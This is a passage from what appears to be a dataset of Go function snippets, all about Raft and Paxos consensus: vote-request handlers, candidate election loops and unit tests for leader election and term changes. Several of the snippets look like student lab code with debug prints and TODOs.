{\n\t\t\tt.Errorf(\"test %d: validators mismatch: have %x, want %x\", i, result, validators)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\tfor j := 0; j < len(result); j++ {\n\t\t\tif !bytes.Equal(result[j][:], validators[j][:]) {\n\t\t\t\tt.Errorf(\"test %d, validator %d: validator mismatch: have %x, want %x\", i, j, result[j], validators[j])\n\t\t\t}\n\t\t}\n\t\tbackend.Stop()\n\t}\n}", "func TestVoter(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tlogterm uint64\n\t\tindex uint64\n\n\t\twreject bool\n\t}{\n\t\t// same logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t\t// candidate higher logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 2, 1, false},\n\t\t// voter higher logterm\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 1, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 2, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(tt.ents)\n\t\tr := newTestRaft(1, []uint64{1, 2}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVote, Term: 3, LogTerm: tt.logterm, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\tif len(msgs) != 1 {\n\t\t\tt.Fatalf(\"#%d: len(msg) = %d, want %d\", i, len(msgs), 1)\n\t\t}\n\t\tm := msgs[0]\n\t\tif m.Type != pb.MsgVoteResp {\n\t\t\tt.Errorf(\"#%d: msgType = %d, want %d\", i, m.Type, pb.MsgVoteResp)\n\t\t}\n\t\tif m.Reject != tt.wreject {\n\t\t\tt.Errorf(\"#%d: reject = %t, want %t\", i, m.Reject, tt.wreject)\n\t\t}\n\t}\n}", "func (a *RPC) VoteForLeader(args *RequestVoteRPCArgs,reply *bool) error{\n\t//r.ResetTimer()\n \t//fmt.Println(\"received Vote request parameter \",(*args).CandidateId,\" \",(*args).Term,\" \",(*args).LastLogTerm,\" \",(*args).LastLogIndex)\n \t//if len(r.Log)>1{\n \t//\tfmt.Println(\"Vote Request folloer parameter \",r.Id,\" \", r.CurrentTerm,\" \",r.Log[len(r.Log)-1].Term ,\" \",len(r.Log)-1)\n \t//}\n\tif r.IsLeader==2 { // if this server is follower\n\t\t//r.ResetTimer() //TODO\n\t\tif r.CurrentTerm > args.Term || r.VotedFor >-1 { // if follower has updated Term or already voted for other candidate in same term , reply nagative\n\t\t\t*reply = false\n\t\t} else if r.VotedFor== -1{ // if follower has not voted for anyone in current Term \n\t\t\tlastIndex:= len(r.Log) \n\t\t\tif lastIndex > 0 && args.LastLogIndex >0{ // if Candiate log and this server log is not empty. \n\t\t\t\tif r.Log[lastIndex-1].Term > args.LastLogTerm { // and Term of last log in follower is updated than Candidate, reject vote\n *reply=false\n }else if r.Log[lastIndex-1].Term == args.LastLogTerm{ // else if Terms of Follower and candidate is same\n \tif (lastIndex-1) >args.LastLogIndex { // but follower log is more updated, reject vote\n \t\t*reply = false\n \t} else {\n \t\t\t*reply = true // If last log terms is match and followe log is sync with candiate, vote for candidate\n \t\t}\n }else{ // if last log term is not updated and Term does not match, \n \t \t\t*reply=true//means follower is lagging behind candiate in log entries, vote for candidate\n \t\t}\n \t\n\t\t\t} else if lastIndex >args.LastLogIndex { // either of them is Zero\n\t\t\t\t*reply = false // if Follower has entries in Log, its more updated, reject vote\n\t\t\t}else{\n\t\t\t\t\t*reply = true // else Vote for candiate\n\t\t\t\t}\n\t\t}else{\n\t\t\t*reply=false\n\t\t}\n\t}else{\n\t\t*reply = false // This server is already a leader or candiate, reject vote\n\t}\n\n\tif(*reply) {\n r.VotedFor=args.CandidateId // Set Voted for to candiate Id if this server has voted positive\n }\n\t/*if(*reply) {\n\t\tfmt.Println(\"Follower \",r.Id,\" Voted for \",r.VotedFor)\n\t}else{\n\t\tfmt.Println(\"Follower \",r.Id,\" rejected vote for \",args.CandidateId)\n\t}*/\n\treturn nil\n}", "func (v *verifyFuture) vote(leader bool) {\n\tv.voteLock.Lock()\n\tdefer v.voteLock.Unlock()\n\n\t// Guard against having notified already\n\tif v.notifyCh == nil {\n\t\treturn\n\t}\n\n\tif leader {\n\t\tv.votes++\n\t\tif v.votes >= v.quorumSize {\n\t\t\tv.notifyCh <- v\n\t\t\tv.notifyCh = nil\n\t\t}\n\t} else {\n\t\tv.notifyCh <- v\n\t\tv.notifyCh = nil\n\t}\n}", "func (handler *RuleHandler) FollowerOnRequestVote(msg iface.MsgRequestVote, log iface.RaftLog, status iface.Status) []interface{} {\n\tactions := []interface{}{}\n\n\t// reject if we recently heard from leader\n\t// (to avoid \"disruptive servers\" during cluster configuration change)\n\tif time.Now().Sub(status.LeaderLastHeard()) < status.MinElectionTimeout() {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// maybe we are outdated\n\tif msg.Term > status.CurrentTerm() {\n\t\tactions = append(actions, iface.ActionSetCurrentTerm{\n\t\t\tNewCurrentTerm: msg.Term,\n\t\t})\n\t}\n\n\t// if candidate is still in a previous term, reject vote\n\tif msg.Term < status.CurrentTerm() {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// reject vote if we voted on another peer already\n\tif status.VotedFor() != \"\" && status.VotedFor() != msg.CandidateAddress {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\treturn actions\n\t}\n\n\tlastEntry, _ := log.Get(log.LastIndex())\n\n\t// if we have no log, surely peer is at least as updated as us. so grant vote\n\tif lastEntry == nil {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: true,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\tactions = append(actions, iface.ActionSetVotedFor{\n\t\t\tNewVotedFor: msg.CandidateAddress,\n\t\t})\n\t\treturn actions\n\t}\n\n\t// ok, we have log. grant vote if peer is as updated as us\n\tif msg.LastLogTerm > lastEntry.Term || (msg.LastLogTerm == lastEntry.Term && msg.LastLogIndex >= log.LastIndex()) {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: true,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\tactions = append(actions, iface.ActionSetVotedFor{\n\t\t\tNewVotedFor: msg.CandidateAddress,\n\t\t})\n\t\treturn actions\n\t}\n\n\t// ok, peer is not as updated as us\n\tactions = append(actions, iface.ReplyRequestVote{\n\t\tVoteGranted: false,\n\t\tTerm: status.CurrentTerm(),\n\t\tAddress: status.NodeAddress(),\n\t})\n\treturn actions\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t//defer rf.updateAppliedLock()\n\t//Your code here (2A, 2B).\n\tisALeader := rf.role == Leader\n\n\tif rf.updateTermLock(args.Term) && isALeader {\n\t\t//DPrintf(\"[DEBUG] Server %d from %d to Follower {requestVote : Term higher}\", rf.me, Leader)\n\t}\n\treply.VoteCranted = false\n\tvar votedFor interface{}\n\t//var isLeader bool\n\tvar candidateID, currentTerm, candidateTerm, currentLastLogIndex, candidateLastLogIndex, currentLastLogTerm, candidateLastLogTerm int\n\n\tcandidateID = args.CandidateID\n\tcandidateTerm = args.Term\n\tcandidateLastLogIndex = args.LastLogIndex\n\tcandidateLastLogTerm = args.LastLogTerm\n\n\trf.mu.Lock()\n\n\treply.Term = rf.currentTerm\n\tcurrentTerm = rf.currentTerm\n\tcurrentLastLogIndex = len(rf.logs) - 1 //TODO: fix the length corner case\n\tcurrentLastLogTerm = rf.logs[len(rf.logs)-1].Term\n\tvotedFor = rf.votedFor\n\tisFollower := rf.role == Follower\n\trf.mu.Unlock()\n\t//case 0 => I'm leader, so you must stop election\n\tif !isFollower {\n\t\tDPrintf(\"[DEBUG] Case0 I [%d] is Candidate than %d\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 1 => the candidate is not suit to be voted\n\tif currentTerm > candidateTerm {\n\t\tDPrintf(\"[DEBUG] Case1 Follower %d > Candidate %d \", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 2 => the candidate's log is not lastest than the follwer\n\tif currentLastLogTerm > candidateLastLogTerm || (currentLastLogTerm == candidateLastLogTerm && currentLastLogIndex > candidateLastLogIndex) {\n\t\tDPrintf(\"[DEBUG] Case2 don't my[%d] newer than can[%d]\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\trf.mu.Lock()\n\t//case3 => I have voted and is not you\n\tif votedFor != nil && votedFor != candidateID {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t//now I will vote you\n\n\tvar notFollower bool\n\trf.votedFor = candidateID\n\tif rf.role != Follower {\n\t\tnotFollower = true\n\t}\n\tDPrintf(\"[Vote] Server[%d] vote to Can[%d]\", rf.me, args.CandidateID)\n\trf.role = Follower\n\treply.VoteCranted = true\n\trf.mu.Unlock()\n\trf.persist()\n\tif notFollower {\n\t\trf.msgChan <- RecivedVoteRequest\n\t} else {\n\t\trf.msgChan <- RecivedVoteRequest\n\t}\n\n\treturn\n}", "func TestStartAsFollower(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateFollower)\n\t}\n}", "func TestVoter_Vote(t *testing.T) {\n\tallia := sdk.NewOntologySdk()\n\tallia.NewRpcClient().SetAddress(RpcAddr)\n\tvoting := make(chan *btc.BtcProof, 10)\n\n\tacct, err := GetAccountByPassword(allia, \"../cmd/lightcli/wallet.dat\", \"passwordtest\")\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to get acct: %v\", err)\n\t}\n\n\tconf := spvwallet.NewDefaultConfig()\n\tconf.RepoPath = \"./\"\n\tconf.Params = &chaincfg.TestNet3Params\n\tsqliteDatastore, err := db.Create(conf.RepoPath)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to create sqlite db: %v\", err)\n\t}\n\tconf.DB = sqliteDatastore\n\twallet, _ := spvwallet.NewSPVWallet(conf)\n\tredeem, _ := hex.DecodeString(\"5521023ac710e73e1410718530b2686ce47f12fa3c470a9eb6085976b70b01c64c9f732102c9dc4d8f419e325bbef0fe039ed6feaf2079a2ef7b27336ddb79be2ea6e334bf2102eac939f2f0873894d8bf0ef2f8bbdd32e4290cbf9632b59dee743529c0af9e802103378b4a3854c88cca8bfed2558e9875a144521df4a75ab37a206049ccef12be692103495a81957ce65e3359c114e6c2fe9f97568be491e3f24d6fa66cc542e360cd662102d43e29299971e802160a92cfcd4037e8ae83fb8f6af138684bebdc5686f3b9db21031e415c04cbc9b81fbee6e04d8c902e8f61109a2c9883a959ba528c52698c055a57ae\")\n\n\twallet.Start()\n\tdefer func() {\n\t\twallet.Close()\n\t\tos.RemoveAll(\"./peers.json\")\n\t\tos.RemoveAll(\"./waiting.bin\")\n\t\tos.RemoveAll(\"./headers.bin\")\n\t\tos.RemoveAll(\"./wallet.db\")\n\t}()\n\n\tquit := make(chan struct{})\n\tv, err := NewVoter(allia, voting, wallet, redeem, acct, 0, 20000, \"\", 6, quit)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to new voter: %v\", err)\n\t}\n\n\tgo v.Vote()\n\tgo v.WaitingRetry()\n\n\tsink := common.NewZeroCopySink(nil)\n\tBp1.Serialization(sink)\n\n\tgo func() {\n\t\tfor {\n\t\t\tvoting <- Bp1\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 10)\n}", "func TestLeaderTransferReceiveHigherTermVote(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\t// Transfer leadership to isolated node to let transfer pending.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup, Index: 1, Term: 2})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\n\t//If RPC request or response contains term T > currentTerm:\n\t//set currentTerm = T, convert to follower\n\tif (args.Term > currentTerm) {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = NILVOTE\n\n\t\tif rf.role == LEADER {\n\t\t\tDPrintf(\"LeaderCondition sorry server %d term %d not a leader, logs %v, commitIndex %d\\n\",rf.me, rf.currentTerm, rf.log, rf.commitIndex) \n\t\t} \n\t\trf.role = FOLLOWER\n\t\trf.persist()\n\t}\n\n\tif args.Term < currentTerm {\n\t\t// Reply false if term < currentTerm \n\t\treply.VoteGranted = false\n\t\treply.Term = currentTerm \n\t}else {\n\t\t//If votedFor is null or candidateId,\n\t\t//and candidate’s log is at least as up-to-date as receiver’s log,\n\t\t//&& rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm)\n\t\tif (rf.votedFor == NILVOTE || rf.votedFor == args.CandidateId) && rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm) {\n\t\t\ti , t := rf.lastLogIdxAndTerm()\n\t\t\tPrefixDPrintf(rf, \"voted to candidate %d, args %v, lastlogIndex %d, lastlogTerm %d\\n\", args.CandidateId, args, i, t)\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\t\n\t\t\treply.VoteGranted = true\n\t\t\treply.Term = rf.currentTerm\n\t\t\t//you grant a vote to another peer.\n\t\t\trf.resetTimeoutEvent = makeTimestamp()\n\t\t}else {\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t}\t\n\t}\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\tDPrintf(\"peer-%d gets a RequestVote RPC.\", rf.me)\n\t// Your code here (2A, 2B).\n\t// First, we need to detect obsolete information\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tstepdown := false\n\t// step down and convert to follower, adopt the args.Term\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\told_state := rf.state\n\t\trf.state = Follower\n\t\tif old_state == Leader {\n\t\t\trf.nonleaderCh <- true\n\t\t}\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t\tstepdown = true\n\t}\n\n\t// 5.4.1 Election restriction : if the requester's log isn't more up-to-date than this peer's, don't vote for it.\n\t// check whether the requester's log is more up-to-date.(5.4.1 last paragraph)\n\tif len(rf.log) > 0 { // At first, there's no log entry in rf.log\n\t\tif rf.log[len(rf.log)-1].Term > args.LastLogTerm {\n\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t\treturn\n\t\t} else if rf.log[len(rf.log)-1].Term == args.LastLogTerm {\n\t\t\tif len(rf.log) > args.LastLogIndex {\n\t\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treply.Term = rf.currentTerm\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// requester's log is more up-to-date than requester's.\n\t// Then, we should check whether this server has voted for another server in the same term\n\tif stepdown {\n\t\trf.resetElectionTimeout()\n\t\t// now we need to reset the election timer.\n\t\trf.votedFor = args.CandidateId // First-come-first-served\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\t/* Section 5.5 :\n\t * The server may crash after it completing an RPC but before responsing, then it will receive the same RPC again after it restarts.\n\t * Raft RPCs are idempotent, so this causes no harm.\n\t */\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false // First-come-first-served, this server has voted for another server before.\n\t}\n\treply.Term = rf.currentTerm\n\treturn\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Follower {\n\t\trf.ResetHeartBeatTimer()\n\t}\n\n\t// term in candidate old than this follower\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\trf.UpdateNewTerm(args.Term)\n\t\trf.stateCh <- Follower\n\t}\n\n\tlogIndexSelf := len(rf.log) - 1\n\n\tvar isNew bool\n\t// the term is equal check the index\n\tif args.LastLogTerm == rf.log[logIndexSelf].Term {\n\t\tisNew = args.LastLogIndex >= logIndexSelf\n\t} else {\n\t\tisNew = args.LastLogTerm > rf.log[logIndexSelf].Term\n\t}\n\n\tif (rf.votedFor == -1 || rf.me == args.CandidateId) && isNew {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treturn\n\t} else {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t}\n\n}", "func TestCandidateFallback(t *testing.T) {\n\ttests := []pb.Message{\n\t\t{From: 2, To: 1, Term: 1, Type: pb.MsgApp},\n\t\t{From: 2, To: 1, Term: 2, Type: pb.MsgApp},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tif r.state != StateCandidate {\n\t\t\tt.Fatalf(\"unexpected state = %s, want %s\", r.state, StateCandidate)\n\t\t}\n\n\t\tr.Step(tt)\n\n\t\tif g := r.state; g != StateFollower {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, g, StateFollower)\n\t\t}\n\t\tif g := r.Term; g != tt.Term {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, tt.Term)\n\t\t}\n\t}\n}", "func (fp *FastPaxos) LeaderVote(vote *Vote) (*common.Future, *common.Future) {\n\treturn fp.fpManager.LeaderVote(vote)\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer DPrintf(\"%d received RequestVote from %d, args.Term : %d, args.LastLogIndex: %d, args.LastLogTerm: %d, rf.log: %v, rf.voteFor: %d, \" +\n\t\t\"reply: %v\", rf.me, args.CandidatedId, args.Term, args.LastLogIndex, args.LastLogTerm, rf.log, rf.voteFor, reply)\n\t// Your code here (2A, 2B).\n\trf.resetElectionTimer()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tlastLogIndex := rf.log[len(rf.log)-1].Index\n\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\tif lastLogTerm > args.LastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// 5.1 Reply false if term < currentTerm\n\tif args.Term < rf.currentTerm {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif (args.Term == rf.currentTerm && rf.state == \"leader\") || (args.Term == rf.currentTerm && rf.voteFor != -1){\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm && rf.voteFor == args.CandidatedId {\n\t\treply.VoteGranted = true\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// Rules for Servers\n\t// All Servers\n\t// If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.voteFor = -1\n\t\trf.mu.Unlock()\n\t\trf.changeState(\"follower\")\n\t\trf.mu.Lock()\n\t}\n\n\trf.voteFor = args.CandidatedId\n\treply.VoteGranted = true\n\t//rf.persist()\n\trf.mu.Unlock()\n\treturn\n}", "func (r *Raft) runCandidate() {\n\t// Start vote for us, and set a timeout\n\tvoteCh := r.electSelf()\n\telectionTimeout := randomTimeout(r.conf.ElectionTimeout, 2*r.conf.ElectionTimeout)\n\n\t// Tally the votes, need a simple majority\n\tgrantedVotes := 0\n\tquorum := r.quorumSize()\n\tr.logD.Printf(\"Cluster size: %d, votes needed: %d\", len(r.peers)+1, quorum)\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Candidate state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\n\t\t// Got response from peers on voting request\n\t\tcase vote := <-voteCh:\n\t\t\t// Check if the term is greater than ours, bail\n\t\t\tif vote.Term > r.getCurrentTerm() {\n\t\t\t\tr.logD.Printf(\"Newer term discovered\")\n\t\t\t\tr.setState(Follower)\n\t\t\t\tif err := r.setCurrentTerm(vote.Term); err != nil {\n\t\t\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check if the vote is granted\n\t\t\tif vote.Granted {\n\t\t\t\tgrantedVotes++\n\t\t\t\tr.logD.Printf(\"Vote granted. Tally: %d\", grantedVotes)\n\t\t\t}\n\n\t\t\t// Check if we've become the leader\n\t\t\tif grantedVotes >= quorum {\n\t\t\t\tr.logD.Printf(\"Election won. Tally: %d\", grantedVotes)\n\t\t\t\tr.setState(Leader)\n\t\t\t\treturn\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\n\t\tcase <-electionTimeout:\n\t\t\t// Election failed! Restart the election. We simply return,\n\t\t\t// which will kick us back into runCandidate\n\t\t\tr.logW.Printf(\"Election timeout reached, restarting election\")\n\t\t\treturn\n\n\t\tcase 